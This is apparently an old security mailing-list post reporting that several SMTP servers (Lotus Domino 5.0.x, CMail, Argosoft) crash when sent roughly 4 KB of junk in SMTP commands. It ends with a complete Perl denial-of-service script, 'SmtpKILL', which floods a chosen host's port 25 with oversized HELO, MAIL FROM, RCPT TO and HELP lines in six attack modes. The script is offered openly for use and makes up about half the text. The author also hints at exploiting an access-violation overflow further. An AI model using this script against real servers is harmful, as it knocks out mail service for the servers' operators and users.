Some SMTP Servers have problems handling with "mail from: 4k_junk" or just "4k_of_junk".

Well I tryed this in : 

* Lotus Domino ESMTP Services running Version 5.0.3 (Intl) and smtp died 
also after mail from: someone@4k_junk 
 
* Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this.

* I also tryed this against Version 5.0.2c (Intl) without success in DOS so 
I assume that 5.0.2c(Intl) is not vulnerable. 

* Merak Server Version 2.10.270 is not also vulnerable. 

* CMail Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk 
BUT is vulnerable to something_4k_junk ! In fact this software even logs 
"mail from: someone@4k_junk" as a DOS attempt but crashes when you just send 
something_4k_junk ! 

* Argosoft Mail Server version 1.2.1.0 doesn´t crash with "mail from: 
someon@4k:_junk" but after some messages it will log : Error: Access 
violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of address 
FFFFFFFF but it will continue to serve :) Maybe we could make something 
funny with this overflow (?) ;))) 

* Many others where I haven´t tryed this...?

I am attaching a demonstration code (perl) for those who want to check any other 
servers that might be vulnerable to this. 

smiler@vxd.org 





#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0 
# and probably many others that I hadn´t chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;   


print "SmtpKILL By smiler\@vxd.org\n";

if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl  <type> <host>
  <type> Type of attack :
    type 1 = long mail from: someone\@4k_of_junk
    type 2 = long rcpt to: someone\@4k_of_junk
    type 3 = long helo longdomain_with_4k_of_junk
    type 4 = long undefined command (4k_of_junk)
    type 5 = long help 4k_of_junk
    type 6 = long mail from: and mail to:

  <host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}      

$type=$ARGV[0];
$target=$ARGV[1];

print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";



for ($i=4096;$i<5096;$i++)
 {
        $obj=Net::Telnet->new( Host => "$target",Port => 25);    

  if ($type=~ "1") { 
  $helo="helo ptrulez";
  $from="mail from: v0v0@". 'ptrulez' x $i;
  $rcpt="rcpt to: v0v0\@v0v0.pt";
  }

  if ($type=~ "2") { 
  $helo="helo ptrulez";
  $from="mail from: v0v0\@v0v0.pt";
  $rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
  }

  if ($type=~ "3") {
  $helo="helo ". 'ptrulez' x $i;
  $from="mail from: v0v0\@v0v0.pt";
  $rcpt="rcpt to: v0v0\@v0v0.pt";
  }

  if ($type=~ "4") {
  $helo="havesomefun". 'ptrulez' x $i;
  }

  if ($type=~ "5") {
  $helo="help ". 'ptrulez' x $i;
  }

  if ($type=~ "6") {
  $helo="helo ptrulez";
  $from="mail from: ". 'ptrulez' x $i;
  $rcpt="rcpt to: ". 'ptrulez' x $i;
  }

        print "$helo\n";$obj->print("$helo");   
        print "$from\n";$obj->print("$from");
        print "$rcpt\n";$obj->print("$rcpt");    
        $obj->close;
 }